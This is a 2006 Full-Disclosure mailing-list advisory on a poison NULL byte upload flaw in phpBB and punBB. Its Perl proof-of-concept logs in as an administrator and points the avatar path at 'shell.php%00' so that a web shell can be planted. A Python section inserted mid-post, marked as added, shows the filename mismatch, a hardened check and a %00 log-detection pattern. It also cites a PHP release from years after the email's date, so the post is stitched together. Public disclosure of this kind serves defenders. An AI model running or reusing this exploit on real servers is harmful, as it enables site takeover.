[Full-disclosure] ShAnKaR: multiple PHP application poison NULL byte vulnerability
- From: 3APA3A <3APA3A@xxxxxxxxxxxxxxxx>
- Date: Tue, 12 Sep 2006 01:33:56 +0400
Author: ShAnKaR
Title: multiple PHP application poison NULL byte vulnerability
Applications: phpBB 2.0.21, punBB 1.2.12
Threat Level: Critical
Original advisory (in Russian): http://www.security.nnov.ru/Odocument221.html
The poison NULL byte vulnerability in Perl CGI applications was described
in [1]. ShAnKaR noted that the same vulnerability also affects various
PHP applications; phpBB and punBB are examples of vulnerable applications.
The vulnerability can be used to upload or replace arbitrary files on the
server, e.g. PHP scripts, by appending a "poison NULL" (%00) to a filename.
In the case of phpBB and punBB, the vulnerability can be exploited by changing
the location of the avatar file and uploading an avatar file with PHP code in
its EXIF data.
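The following is an added example (not part of ShAnKaR's advisory or the phpBB/punBB code) that shows why the %00 trick works and what a hardened upload check looks like. It models a hypothetical avatar upload handler: `php_level_extension` stands in for a counted-length string check that treats the NUL as an ordinary byte, `c_string_view` stands in for the NUL-terminated C path that the filesystem actually opens, and `is_safe_upload_name` is the corrected validation. The parameter name `avatar_path` comes from the advisory; the allowed-extension set and the sample log lines are constructed for the demonstration.

```python
import os
import re
from urllib.parse import unquote_to_bytes

# Extensions the (hypothetical) avatar upload handler is meant to accept.
ALLOWED_EXT = {b".gif", b".jpg", b".jpeg", b".png"}


def decode_form_value(encoded: str) -> bytes:
    """URL-decode a form field the way the web server hands it to the
    application: '%00' becomes a literal NUL byte inside the value."""
    return unquote_to_bytes(encoded)


def php_level_extension(raw: bytes) -> bytes:
    """Extension as a counted-length string function sees it: the NUL is just
    another byte, so 'shell.php\\0.gif' looks like a .gif."""
    return os.path.splitext(raw)[1].lower()


def c_string_view(raw: bytes) -> bytes:
    """Path as a NUL-terminated C API (open/fopen underneath the PHP file
    functions of that era) sees it: everything after the first NUL is gone."""
    nul = raw.find(b"\x00")
    return raw if nul < 0 else raw[:nul]


def is_safe_upload_name(raw: bytes) -> bool:
    """Hardened check: reject anything whose validated name could differ from
    the name the filesystem would actually open."""
    if not raw or b"\x00" in raw:          # the poison NULL byte itself
        return False
    if b"/" in raw or b"\\" in raw:        # no directory components at all
        return False
    if raw.startswith(b".") or b".." in raw:
        return False
    if len(raw) > 64:
        return False
    return os.path.splitext(raw)[1].lower() in ALLOWED_EXT


def classify(encoded_name: str) -> dict:
    """Show the divergence between what a naive check validates and what the
    filesystem would open, together with the hardened verdict."""
    raw = decode_form_value(encoded_name)
    return {
        "checked_extension": php_level_extension(raw),
        "filesystem_opens": c_string_view(raw),
        "accepted": is_safe_upload_name(raw),
    }


NUL_IN_QUERY = re.compile(r"%00", re.IGNORECASE)

# Constructed access-log lines for the detection check (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Sep/2006:01:33:56 +0400] "POST /forum/admin/admin_board.php?sid=abc HTTP/1.1" 200 512',
    '10.0.0.7 - - [12/Sep/2006:01:34:02 +0400] "GET /forum/profile.php?avatar_path=images/avatars/shell.php%00 HTTP/1.1" 200 88',
    '10.0.0.9 - - [12/Sep/2006:01:34:10 +0400] "GET /forum/images/avatars/user.gif HTTP/1.1" 200 2048',
]


def nul_byte_requests(log_lines):
    """Cheap log/WAF check: flag requests carrying a URL-encoded NUL byte."""
    return [line for line in log_lines if NUL_IN_QUERY.search(line)]


if __name__ == "__main__":
    print(classify("shell.php%00.gif"))   # extension check passes, filesystem opens shell.php
    print(classify("avatar.gif"))         # consistent in both views, accepted
    for hit in nul_byte_requests(SAMPLE_LOG):
        print("suspicious:", hit)
```

The point of `classify` is the split verdict: the naive check sees `.gif` while the filesystem opens `shell.php`, which is exactly the mismatch the advisory exploits. Rejecting any embedded NUL before the name reaches a file function closes that gap regardless of how the extension is checked; later PHP releases (5.3.4 and up) refuse paths containing NUL bytes at the file-function level, but application-side validation remains the right place to enforce it. The `nul_byte_requests` helper is a starting point for hunting the pattern in web server logs, not a substitute for patching.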
A PoC exploit to change the avatar file location for phpBB:
#!/usr/bin/perl -w
use HTTP::Cookies;
use LWP;
use URI::Escape;
unless(@ARGV){die "USE:\n./phpbb.pl localhost.com/forum/ admin pass images/avatars/shell.php [d(DEBUG)]\n"}
my $ua = LWP::UserAgent->new(agent=>'Mozilla/4.0 (compatible; Windows 5.1)');
$ua->cookie_jar( HTTP::Cookies->new());
$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1";
my $req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
my $res = $ua->request($req);
$res=$ua->get('http://'.$ARGV[0].'/login.php');
$content=$res->content;
$content=~ m/true&sid=([^"]+)"/g;
if($ARGV[4]){
$content=$res->content;
print $content;
}
$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1&admin=1";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);
$url='http://'.$ARGV[0].'/admin/admin_board.php?sid='.$1;
$data="submit=submit&allow_avatar_local=1&avatar_path=".$ARGV[3]."%00";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);
if($ARGV[4]){
$content=$res->content;
print $content;
}
References:
[1] rain.forest.puppy, "Perl CGI problems", Phrack Magazine, Issue 55
--
http://www.security.nnov.ru
/\_/\
{ , . } |\
+--oQQo->{ ^ }<-----+ \
| ZARAZA U 3APA3A } You know my name - look up my number (The Beatles)
+-------------o66o--+ /
|/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/